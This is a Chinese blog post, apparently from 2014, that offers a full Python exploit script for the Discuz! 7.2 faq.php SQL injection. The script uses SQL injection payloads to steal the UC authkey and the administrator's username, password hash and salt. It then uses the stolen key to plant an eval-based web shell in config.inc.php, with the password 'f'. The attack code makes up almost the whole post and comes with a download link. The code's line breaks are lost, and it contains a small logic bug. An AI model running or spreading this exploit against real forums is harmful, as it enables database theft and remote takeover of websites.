具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:

http://www.freebuf.com/vuls/37643.html

 

看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个

获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-048137,不过dz7.2跟dz2.x的目录结构是不同的,没有config/config.php目录(我从官方下载的),反正废话不说,直接贴代码了

#!/usr/bin/env python# coding: utf-8# Fooying@2014-06-30 23:42:25'''Discuz 7.2 /faq.php SQL注入漏洞利用程序请勿用于非法行为,否则后果自负'''import sysimport urllib2import urllibimport hashlibimport timeimport mathimport base64HELP_STR = '''=======================================================Discuz < = 7.2 faq.php sqlinj  GetshellAutor:Fooying http://www.fooying.com=======================================================Usage:    python dz7.2_key_getshell.py url method_code(1/2/3)Method code:    1、get_shell    2、get key    3、get admininput -h or --help get help======================================================='''GET_KEY_PAYLOAD = ('/faq.php?action=grouppermission&gids[99]=%27'    '&gids[100][0]=)%20union%20select%201%20from%20(select%20coun'    't(*),concat(0x236623,(select%20md5(authkey)%20from%20cdb_uc_ap'    'plications%20limit%201),0x236623,floor(rand(0)*2))a%20from%20i'    'nformation_schema.tables%20group%20by%20a)b--%20a')GET_ADMIN_PAYLOAD = ('/faq.php?action=grouppermission&gids[99]=%27&'    'gids[100][0]=) and (select 1 from (select count(*),concat((sele'    'ct (select (select concat(0x236623,username,0x236623,password,0'    'x236623,salt,0x236623) from cdb_uc_members limit 1) ) from `inf'    'ormation_schema`.tables limit 0,1),floor(rand(0)*2))x from info'    'rmation_schema.tables group by x)a)%23')GET_SHELL_PALOAD = ('''<?xml version="1.0" encoding="ISO-8859-1"?><ro '''    '''ot><item id="UC_API">https://sb');eval($_REQUEST[f]);#</item>''')def url_format(url):    if not url.startswith(('http://', 'https://')):        url += 'http://'    if url.endswith('/'):        url = url[:-1]    return urldef url_request(url, data=None):    headers ={        'User-Agent' : ('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) '            'AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'        ),    }    try:        req = urllib2.Request(url, data=data, headers=headers)        ret = urllib2.urlopen(req)    except Exception, e:        print 'request error:%s' %e        return None    else:        return ret.read()def get_error_content(text):    text = text.split('<b>Error</b>:')    if len(text) > 1:        text = text[1]        text = text.split('<b>Errno.</b>:')[0]        text = text.replace('<br />', '')        text = text.strip()        return text    return ''def get_authcode(string, key):    ckey_length = 4;    key = hashlib.md5(key).hexdigest();    keya = hashlib.md5(key[0:16]).hexdigest();    keyb = hashlib.md5(key[16:32]).hexdigest();    microtime = '%.8f %d' % math.modf(time.time())    keyc = (hashlib.md5(microtime).hexdigest())[-ckey_length:]    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()    key_length = len(cryptkey)    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string    string_length = len(string)    count = 0    box = range(256)    for n in range(256):        randkey = ord(cryptkey[n % key_length])        count = (count + box[n] + randkey) % 256        tmp = box[n]        box[n] = box[count]        box[count] = tmp    i = j = 0    result = ''    for n in range(string_length):        i = (i + 1) % 256        j = (j + box[i]) % 256        tmp = box[i]        box[i] = box[j]        box[j] = box[i]        result += chr(ord(string[n]) ^ (box[(box[i] + box[j]) % 256]))    result = base64.b64encode(result).replace('=', '')    return keyc + resultdef get_shell(url, key):    host = url    query_string = 'time=%s&action=updateapps' % time.time()    code = urllib.quote(get_authcode(query_string, key))    url += '?code=%s' % code    text = url_request(url, GET_SHELL_PALOAD)    if text != None:        print 'get shell succeeful!the shell url:%s/config.inc.php, pass:f' % hostdef get_key(url):    url += GET_KEY_PAYLOAD    text = url_request(url)    if text:        text = get_error_content(text)        if '#f#' in text:            key = text.split('#f#')[1]            print '=========================================='            print 'Key: %s' % key            print '=========================================='            return key        else:            print 'get key error!n'            print text + 'n'def get_admin(url):    url += GET_ADMIN_PAYLOAD    text = url_request(url)    if text:        text = get_error_content(text)        if '#f#' in text:            keys = text.split('#f#')            username = keys[1]            password = keys[2]            salt = keys[3]            print '=========================================='            print 'Username:%snPassword:%snSalt:%s' % (username, password, salt)            print '=========================================='        else:            print 'get admin error!n'            print text + 'n'def main(url, method_code=1):    url = url_format(url)    if method_code == '2':        get_key(url)    elif method_code == '3':        get_admin(url)    else:        key = get_key(url)        if key:            get_shell(url, key)        else:            print 'Get shell error: There is a problem with get key!'if __name__ == '__main__':    keys = sys.argv    if '-h' in keys or '--help' in keys or len(keys)!=3:        print HELP_STR    else:        main(keys[1], keys[2])</ro>

效果如下:

文件下载:http://pan.baidu.com/s/1o6JREVC 密码:06r8